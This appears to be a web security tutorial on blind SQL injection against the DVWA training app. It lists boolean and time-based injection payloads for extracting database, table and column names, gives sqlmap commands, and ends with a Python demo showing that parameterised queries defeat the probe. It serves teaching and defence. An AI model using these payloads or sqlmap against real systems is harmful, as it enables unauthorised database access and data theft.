Web Security Fundamentals Tutorial
SQL injection: blind injection, injection testing, and basic use of sqlmap
What is blind SQL injection? In ordinary SQL injection, the result of the SQL we inject is returned to us. For example, if we inject database(), the response lists the name of the current database, dvwa. Blind injection is more like answering true/false questions: the result of what we execute is never displayed; the application only tells us "true" or "false", with no echo. Echo: the display of the command being executed and its results.
Guess the length of the database name: 1' and length(database())>1 # (or =1; raise the number one step at a time, 1, 2, 3 …) → 4
Guess the database name: 1' and ascii(substr(database(),1,1))>97 # (compare against ASCII codes) → dvwa. Using < and > quickly narrows the range.
Guess the table names:
1、Guess the number of tables: 1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #
2、Guess the length of a table name: 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #
Get the table name: 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 #
Guess the length of a column name: 1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1 #
Guess the column name: 1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>120 #
sqlmap
Against a URL: python sqlmap.py -u "url"
Against a captured request (saved to a file): python sqlmap.py -r 1.txt
Time-based blind injection
Determine the length of the database name: 1' and if(length(database())=4,sleep(3),1) #
Guess the database name: 1' and if(ascii(substr(database(),1,1))>97,sleep(3),1) #
Guess the number of tables: 1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1) #
Guess the length of a table name: 1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) #
All of the following steps can be combined with binary search to narrow the range …
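The boolean oracle the slides rely on exists only because user input is concatenated into the SQL text. The added example below (not from the slides; it uses a constructed in-memory SQLite table standing in for DVWA's users table, and length(sqlite_version()) in place of length(database()) because SQLite has no database() function) shows the same "1' and <condition>" probe against a concatenated query and against a parameterised one: the first answers true/false depending on the condition, the second never does.

```python
import sqlite3

# Constructed demo table standing in for DVWA's users table (not from the slides).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, first_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "gordon")])
    return conn

def lookup_vulnerable(conn, user_id):
    """Builds the query by string concatenation: the input becomes SQL text."""
    sql = f"SELECT first_name FROM users WHERE id = '{user_id}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, user_id):
    """Binds the input as a parameter: it is compared as a value, never parsed as SQL."""
    sql = "SELECT first_name FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]

def oracle(lookup, conn, condition):
    """True when a row comes back for the probe "1' and <condition>".

    Same shape as the slides' payloads; SQLite has no '#' line comment, so the
    dangling closing quote is neutralised with '-- ' instead.
    """
    return bool(lookup(conn, f"1' and {condition} -- "))

if __name__ == "__main__":
    db = make_db()
    # Analogue of length(database())>1: sqlite_version() is "3.x.y", so its length is > 1
    for cond in ("length(sqlite_version())>1", "length(sqlite_version())>100"):
        print(cond, "| vulnerable:", oracle(lookup_vulnerable, db, cond),
              "| safe:", oracle(lookup_safe, db, cond))
```

With the concatenated query the two probes return True and False, which is the bit the blind attacker extracts; with the bound parameter both return False because the whole string is compared to the id column as a value, while an ordinary lookup such as lookup_safe(db, "1") still works.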
Thanks